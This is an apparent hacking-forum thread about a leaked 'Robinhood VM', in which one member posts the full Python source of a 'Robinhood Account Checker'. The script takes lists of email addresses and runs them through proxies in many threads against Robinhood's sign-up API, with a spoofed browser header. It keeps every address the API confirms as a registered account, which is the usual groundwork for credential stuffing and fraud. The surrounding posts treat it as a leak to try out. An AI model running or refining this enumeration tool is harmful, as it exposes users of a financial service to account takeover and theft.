Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   4609

[SOURCE CODE] Robinhood VM

by disgustCI - 25 May, 2025 - 08:11 PM
This post is by a banned member (disgustCI) - Unhide
disgustCI  
Registered
13
Posts
3
Threads
Bumped #9
This is a bump
This post is by a banned member (blackjackmac) - Unhide
13
Posts
0
Threads
#10
does it work why was he banned?
This post is by a banned member (pryoxiss) - Unhide
pryoxiss  
Registered
44
Posts
0
Threads
#11
[font]what is this[/font]
This post is by a banned member (Meth9884) - Unhide
Meth9884  
Registered
27
Posts
0
Threads
#12
ty let's see
This post is by a banned member (FantaExotic) - Unhide
This post is by a banned member (coldasf100) - Unhide
17
Posts
0
Threads
#14
(25 May, 2025 - 08:11 PM)disgustCI Wrote: Show More
Robinhood VM
Like + Rep for more leaks

Show ContentSpoiler:

2222fff22f2f
This post is by a banned member (Soldering) - Unhide
Soldering  
Infinity
169
Posts
27
Threads
6 Years of service
#15
(This post was last modified: 11 August, 2025 - 11:07 AM by Soldering.)
Code:
 
###########################################################
#                                                         #
#        Robinhood Account Checker - Expanded Version     #
#        Improved for robustness and maintainability      #
#                                                         #
###########################################################

import requests
import json
import re
import time
import logging
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from enum import Enum

# Initialize colorama for colored console output
init(autoreset=True)

# --- Configuration ---

# Setup basic logging to a file and to the console
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler("checker.log"),
        logging.StreamHandler()
    ]
)

# Regular expression for validating email format
EMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$')

# --- Helper Classes and Functions ---

class Status(Enum):
    """Enumeration for check results."""
    VALID = f"{Fore.GREEN}VALID"
    INVALID = f"{Fore.RED}INVALID"
    RATE_LIMITED = f"{Fore.YELLOW}RATE_LIMITED"
    ERROR = f"{Fore.MAGENTA}ERROR"
    BAD_FORMAT = f"{Fore.CYAN}BAD_FORMAT"

def load_config():
    """Loads configuration from config.json with robust error handling."""
    try:
        with open("config.json", "r") as f:
            config = json.load(f)
        
        # Set default values for optional settings
        config.setdefault("threads", 10)
        config.setdefault("timeout", 10)
        config.setdefault("proxy", None)
        
        return config
    except FileNotFoundError:
        logging.critical("config.json not found! Please create it.")
        exit()
    except json.JSONDecodeError:
        logging.critical("config.json is not valid JSON. Please fix it.")
        exit()

def get_proxies(proxy_string):
    """Formats the proxy string for the requests library."""
    if not proxy_string:
        return None
    return {
        "http": f"http://{proxy_string}",
        "httpsias": f"http://{proxy_string}",
    }

# --- Core Logic ---

def check_email(email: str, session: requests.Session, timeout: int):
    """
    Checks a single email against the Robinhood API.

    Args:
        email (str): The email address to check.
        session (requests.Session): The session object to use for the request.
        timeout (int): The request timeout in seconds.

    Returns:
        tuple[Status, str]: A tuple containing the result status and the email.
    """
    if not EMAIL_PATTERN.match(email):
        return Status.BAD_FORMAT, email

    url = "https://api.robinhood.com/user/"
    payload = {"email": email}
    
    try:
        response = session.put(url, json=payload, timeout=timeout)
        
        # Check based on HTTP Status Code first, as it's more reliable
        if response.status_code == 400:
            # A 400 Bad Request can mean different things. We inspect the JSON.
            response_json = response.json()
            if "A user with this email already exists." in response_json.get("email", []):
                return Status.VALID, email
            else:
                # Any other 400 error is unexpected.
                return Status.ERROR, f"{email} | Unexpected 400 Response: {response.text}"
        elif response.status_code == 200:
            # A 200 OK with a prompt for more fields means the email is available (invalid for our purposes).
            return Status.INVALID, email
        elif response.status_code == 429:
            # Explicitly handle rate limiting
            return Status.RATE_LIMITED, email
        else:
            # Handle other unexpected status codes
            return Status.ERROR, f"{email} | Status: {response.status_code} | Response: {response.text}"
            
    except requests.exceptions.ProxyError:
        return Status.ERROR, f"{email} | Proxy Error"
    except requests.exceptions.ConnectTimeout:
        return Status.ERROR, f"{email} | Connection Timeout"
    except requests.exceptions.RequestException as e:
        return Status.ERROR, f"{email} | Request Exception: {e}"

# --- Main Execution ---

def main():
    """Main function to orchestrate the checking process."""
    config = load_config()
    threads = config["threads"]
    timeout = config["timeout"]
    proxies = get_proxies(config["proxy"])
    
    try:
        with open("emails.txt", "r") as f:
            emails = {line.strip() for line in f if line.strip()}
        if not emails:
            logging.warning("emails.txt is empty. Nothing to do.")
            return
    except FileNotFoundError:
        logging.critical("emails.txt not found! Please create it and add emails to check.")
        return

    logging.info(f"Loaded {len(emails)} unique emails. Starting checker with {threads} threads.")

    # Use a requests.Session object for connection pooling and setting headers/proxies once
    with requests.Session() as session:
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
            "Content-Type": "application/json"
        })
        if proxies:
            session.proxies.update(proxies)

        with ThreadPoolExecutor(max_workers=threads) as executor:
            # Submit all jobs to the executor
            future_to_email = {executor.submit(check_email, email, session, timeout): email for email in emails}
            
            for future in as_completed(future_to_email):
                try:
                    status, message = future.result()
                    
                    print(f"[{status.value}{Style.RESET_ALL}] {message}")

                    if status == Status.VALID:
                        with open("output_valid.txt", "a") as f:
                            f.write(f"{message}\n")
                    
                    elif status == Status.RATE_LIMITED:
                        logging.warning("Rate limit hit. Consider reducing threads or adding a delay.")
                        # You could add a global sleep or pause job submission here if needed

                except Exception as e:
                    email = future_to_email[future]
                    logging.error(f"An unexpected error occurred for email {email}: {e}")

    logging.info("Checking complete.")

if __name__ == "__main__":
    main()


I've updated the main.py file to better handle requests 

Not sure what OP was doing but the original was shit.
This post is by a banned member (drax2025) - Unhide
drax2025  
Registered
12
Posts
0
Threads
#16
lmao

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)